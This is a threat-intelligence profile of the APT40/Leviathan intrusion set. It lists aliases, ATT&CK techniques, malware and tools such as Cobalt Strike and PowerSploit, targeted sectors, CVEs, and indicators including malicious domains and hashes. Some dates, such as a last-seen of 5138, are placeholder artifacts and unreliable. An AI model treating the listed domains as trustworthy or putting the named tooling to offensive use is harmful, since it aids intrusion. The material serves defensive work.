Leviathan
Essential information
- Confidence
- 100/100
- Published
- 16/12/2025 19:39
- Modified
- 27/03/2026 01:13
- Updated at
- 27/03/2026 01:13
- Revoked
- No
- Author / Source
- The MITRE Corporation
- Resource level
- —
- Primary motivation
- —
- Related entities
- 51 attack patterns (mitre), 19 malware, 9 sectors, 3 countries, 105 indicators, 5 vulnerabilities (cve), 7 tool, 1 campaign
Aliases
MUDCARP Kryptonite Panda Gadolinium BRONZE MOHAWK TEMP.Jumper TEMP.Periscope Gingham Typhoon APT40
Description
Marking (TLP)
TLP:CLEAR Copyright 2015-2025, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.
External references
- CISA AA21-200A APT40 July 2021
- FireEye APT40 March 2019
- SecureWorks BRONZE MOHAWK n.d.
- Microsoft Threat Actor Naming July 2023
- CISA Leviathan 2024
- Crowdstrike KRYPTONITE PANDA August 2018
- mitre-attack (G0065)
- Accenture MUDCARP March 2019
- MSTIC GADOLINIUM September 2020
- FireEye Periscope March 2018
- Proofpoint Leviathan Oct 2017
Related entities
Attack patterns, malware, vulnerabilities, indicators and other entities linked to this intrusion set.
Attack patterns (MITRE) (51)
-
T1027.003 usesSteganography MITRE
-
T1218.010 usesRegsvr32 MITRE
-
T1589.001 usesCredentials MITRE
-
-
Exploits usesT1587.004 MITRE
-
T1021.001 usesRemote Desktop Protocol MITRE
-
T1059.005 usesVisual Basic MITRE
-
Email Accounts usesT1585.002 MITRE
-
T1059.001 usesPowerShell MITRE
-
T1003 usesOS Credential Dumping MITRE
-
T1584.004 usesServer MITRE
-
T1074.002 usesRemote Data Staging MITRE
Malware (19)
-
BADFLICK uses
-
gh0st RAT - S0032 usesFamily
-
BLACKCOFFEE uses
-
Derusbi uses
-
Orz - S0229 uses
-
NanHaiShu usesFamily The MITRE Corporation Confidence 100
[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South…
First seen 01/01/1970 · Last seen 16/11/5138 · -
Cobalt Strike usesFamily
-
MURKYTOP usesFamily The MITRE Corporation Confidence 100
[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)
First seen 01/01/1970 · Last seen 16/11/5138 · -
MURKYTOP - S0233 uses
-
Orz uses
-
Derusbi - S0021 usesAlienVault Confidence 100First seen 01/01/1970 · Last seen 16/11/5138 ·
-
PowerSploit - S0194 uses
Sectors (9)
-
Healthcare targets
-
Government targets
-
Healthcare research targets
-
Manufacturing targets
-
Defense targets
-
Aerospace targets
-
Education targets
-
Maritime transport targets
-
Transportation targets
Countries (3)
-
United States of America targets
-
China targets
-
Canada targets
Indicators (105)
-
indiadigest.inindicates -
5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362indicates -
nmw4xhipveaca7hm.onion.linkindicates -
2807071ec9d2d3a7e8609e1d16f1e7cce950ae4f57e6b1e0463a34865f75d3a1indicates -
santaclarasystem.usindicatesstix 100/100 RevokedNS=ns1.santaclarasystem.us
· Valid until 08/06/2022 · Source: AlienVault -
stix 100/100 Revoked
Exploit:O97M/CVE-2017-0199!rfn SHA256 of 35f456afbe67951b3312f3b35d84ff0a
· Valid until 26/10/2020 · Source: AlienVault -
cdf6e2e928a89cbb857e688055a25e37a8d8b8b90530bd52c8548fb544f66f1findicates -
stix 100/100 Revoked· Valid until 15/11/2022 · Source: AlienVault
-
yootypes.comindicates -
thyssenkrupp-marinesystems.orgindicatesstix 100/100 Revoked· Valid until 19/05/2020 · Source: AlienVault -
newbb-news.comindicatesstix 100/100 RevokedNS=ns1.newbb-news.com
· Valid until 08/06/2022 · Source: AlienVault -
thestar.liveindicates
Vulnerabilities (CVE) (5)
Atlassian Confluence Server and Data Server contain an Object-Graph Navigation Language (OGNL) injection vulnerability that may allow an unauthenticated attacker to execute …
- Published
- 03/11/2021
- Modified
- 21/12/2025
Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.
- Published
- 03/11/2021
- Modified
- 20/12/2025
Microsoft Exchange Server contains an unspecified vulnerability that allows for security feature bypass.
- Published
- 03/11/2021
- Modified
- 20/12/2025
Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.
- Attack vector
- Network
- Published
- 10/12/2021
- Modified
- 27/05/2026
Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.
- Published
- 03/11/2021
- Modified
- 29/05/2026
Tool (7)
-
PowerSploit usesThe MITRE Corporation Confidence 100
[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code…
-
Tor usesThe MITRE Corporation Confidence 100
[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the…
-
BITSAdmin usesThe MITRE Corporation Confidence 100
[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)
-
at usesThe MITRE Corporation Confidence 100
[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at)
-
Net usesThe MITRE Corporation Confidence 100
The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft…
-
Empire usesThe MITRE Corporation Confidence 100
[Empire](https://attack.mitre.org/software/S0363) is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents…
-
The MITRE Corporation Confidence 100
[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)
Campaign (1)
-
Leviathan Australian Intrusions attributed-to